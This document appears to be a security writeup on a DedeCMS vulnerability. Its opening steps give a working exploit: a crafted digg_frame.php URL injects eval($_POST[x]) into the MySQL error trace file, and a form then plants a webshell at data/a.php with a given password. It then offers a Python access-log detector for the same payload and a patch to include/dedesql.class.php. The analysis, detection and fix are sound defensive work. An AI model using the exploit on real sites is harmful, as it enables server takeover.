Author: Zhang Heng
Assume that the domain name is www.abc.com. The attack steps are as follows:
1. Visit the following URL:
http://www.abc.com/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
2. Open http://www.abc.com/data/mysql_error_trace.php. Seeing the following output proves that the injection succeeded:
int(3) Error: Illegal double '1024e1024' value found during parsing
Error SQL: Select goodpost,badpost,scores From `gxeduw_archives` where id = 1024e1024 limit 0,1; */?>
3. Open the file test.html from the accompanying archive. Note that the form's action address is:
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After submitting the form, the output shown in step 2 indicates that the webshell file has been written successfully.
Webshell URL: http://www.abc.com/data/a.php
Password: 2006888
Vulnerability Analysis:
An overflowing MySQL field value raises a database error. DedeCMS records database error messages into a PHP file (data/mysql_error_trace.php), and the header of that file is not guarded, so attacker-controlled text from the failed query is written into a file the web server will execute as PHP.
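Detection logic for this chain, run over constructed web-server access-log lines, as an added example that is not part of the original writeup. The Apache-style log format, IP addresses and timestamps are assumed; the paths and the `1024e1024` / `*/` markers come from the steps above.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache-style access-log lines (assumed format; not from any real server).
# The first mirrors the request from step 1, the next two the reads of the error trace.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2012:10:01:02 +0000] "GET /plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);?> HTTP/1.1" 200 512
203.0.113.7 - - [12/Mar/2012:10:01:05 +0000] "GET /data/mysql_error_trace.php HTTP/1.1" 200 120
203.0.113.7 - - [12/Mar/2012:10:01:09 +0000] "POST /data/mysql_error_trace.php HTTP/1.1" 200 0
198.51.100.3 - - [12/Mar/2012:10:02:00 +0000] "GET /plus/digg_frame.php?action=good&id=42&mid=7 HTTP/1.1" 200 512
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
PHP_MARKERS = ("*/", "<?", "?>", "eval(", "$_POST", "$_GET", "$_REQUEST")
ERROR_TRACE = "/data/mysql_error_trace.php"
DIGG_FRAME = "/plus/digg_frame.php"

def inspect_request(method, url):
    """Return the reasons one request matches the injection chain (empty list if clean)."""
    parts = urlsplit(url)
    reasons = []
    if parts.path == ERROR_TRACE:
        # The trace is a server-side log; browsers have no business fetching or POSTing to it.
        reasons.append(f"{method} to error trace file")
    if parts.path == DIGG_FRAME:
        params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
        # 'id' must be a plain integer; '1024e1024' is the overflow trigger seen in step 2.
        for value in params.get("id", []):
            if not value.isdigit():
                reasons.append(f"non-numeric id {value!r}")
        # PHP syntax in any parameter that ends up in the logged SQL is the write primitive.
        for name, values in params.items():
            if any(marker in v for v in values for marker in PHP_MARKERS):
                reasons.append(f"PHP code in {name}")
    return reasons

def scan_log(text):
    """Parse access-log text and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, method, url, _status = m.groups()
        reasons = inspect_request(method, url)
        if reasons:
            findings.append({"ip": ip, "method": method, "path": urlsplit(url).path, "reasons": reasons})
    return findings
```

Any hit on the error trace path is worth alerting on by itself, since the file is only ever meant to be written by the CMS, never requested by a client.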
Solution:
Open the file include/dedesql.class.php.
Find the line
@fwrite($fp, '<'.'?php '."/* {$savemsg} */?".">");
and replace it with
@fwrite($fp, '<'.'?php '."exit;/* {$savemsg} */?".">");
so that the trace file exits before any logged content can run. Then clear the contents of data/mysql_error_trace.php.